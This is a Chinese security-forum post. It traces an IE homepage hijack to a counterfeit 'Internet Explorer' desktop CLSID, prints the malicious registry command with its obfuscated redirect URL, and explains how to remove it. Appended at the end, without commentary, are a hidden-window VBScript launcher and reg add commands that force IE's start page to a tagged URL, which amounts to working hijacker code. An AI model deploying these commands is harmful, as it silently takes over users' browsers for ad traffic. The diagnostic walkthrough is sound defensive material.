註冊表-惡意首頁追蹤之旅(IE不能改主頁)

惡意首頁追蹤之旅
(先說下,360沒法修復這個惡意首頁)

話說,今天下了個掃站的工具,結果一不當心中了惡意廣告!

中招後不停的亂下東西安裝,360不停的在那彈出提示!

無語了,一個個卸載,把C:\windows\svchost.exe 和 svcho.exe 刪除,而後打上免疫!

但是打開IE就傻了,之前主頁明明是hao123(呵呵,仍是習慣導航老祖宗),打開卻跳到了一個垃圾導航
http://06000.cn/xy.htm,這種惡意修改,看到就煩!

打開屬性看主頁,沒問題啊..就是 hao123 !

懶的手動改,用360修復首頁試了試,汗一個   ,沒反應,看來只得動手了!

右鍵IE圖標,點"屬性"的確彈出的是設置屬性對話框,而並不是是個快捷方式傳參式冒充,並且
主頁就是hao123!

在註冊表中搜 http://06000.cn/xy.htm 沒有相關結果

再打開IE看看, 發現有跳轉 先是 http://g1476.cn 而後才跳到 http://06000.cn/xy.htm

好,那就搜 g1476.cn

仍是沒結果!

MS還有點棘手, 打開桌面自定義,發現IE並未打勾,而後就打上勾保存,發現桌面多出了一個IE圖標

還真是山寨,並且是仿真版的,日常都是個快捷方式,這回還出新花招了!

(右鍵點這個山寨IE, 菜單中有刪除, 但刪除沒一點反應)

順便說一下,桌面的 "個人電腦","回收站","IE" 並不是是文件或文件夾(dir一下"%userprofile%\桌面"就知道了),
而是桌面特殊項,每個都對應一個類標識符,相關信息存在註冊表中!

定位到 桌面的特殊項
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID
瞅了下,沒什麼變化!

再定位到
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

問題出來了: {3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 這個好陌生

 

雖然桌面的特殊項沒能力記憶下來,可是這個開頭的{3D3D 一點印象都沒

打開它的值,發現是 Internet Explorer

??? 難道記錯了?

看來得確認一下IE的類標識究竟是多少,把真正的IE名字改爲Internet Explorers,
註冊表中搜索新IE名字--Internet Explorers,

定位到了的真正的類標識符是 {871C5380-42A0-1069-A2EA-08002B30309D}

肯定了,那個{3D3D..還真是高仿山寨!

到此,還不死心,還得看看它究竟是怎麼隱蔽修改個人IE首頁:

到 HKEY_CLASSES_ROOT\CLSID 搜索{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45}

出來了:

 

DefaultIcon 對應的IE圖標項
shell\D\command 對應菜單中的刪除選項(關聯的程序是Rundll32.exe,沒傳參,這就是在在桌面右鍵刪除山寨IE無效
的緣由啦)
屬性(&R) 對應的就是IE設置對話框 其值 爲Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl
(就是打開IE設置的對話框了)
ShellFolder  裏設定它的屬性

open 這就是IE被竄改的根源了,它的 command值爲

C:\Program Files\Internet Explorer\iexplore.exe %1 h%t%t%p%:%/%/%g%11%14%17%16%.%c%n%

好暈,又是這種密文,把%1 和%去掉 後就是惡意首頁了 http://g1476.cn 你們可別上,當心中招!

到此,惡意修改的根源就抓到了!

解決方法:

搜索註冊表,刪除搜到的{3D3DBDD2-DD4D-B157-4264-0B0D4DD6BD45} 所有信息 便可!

首頁被惡意竄改的手段不少...有時候工具也會失效,還得靠本身的雙手!轉載請註明出自飯客安全論壇 -  http://bbs.hackfans.com.cn/,本貼地址:http://bbs.hackfans.com.cn/viewthread.php?tid=45933

=====================================================================================

IE修改器

 

dat文件
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\WINDOWS\home.cmd", 0, TRUE)

 

COM文件
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.2255.net/?ysd222 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe http://www.2255.net/?ysd222" /f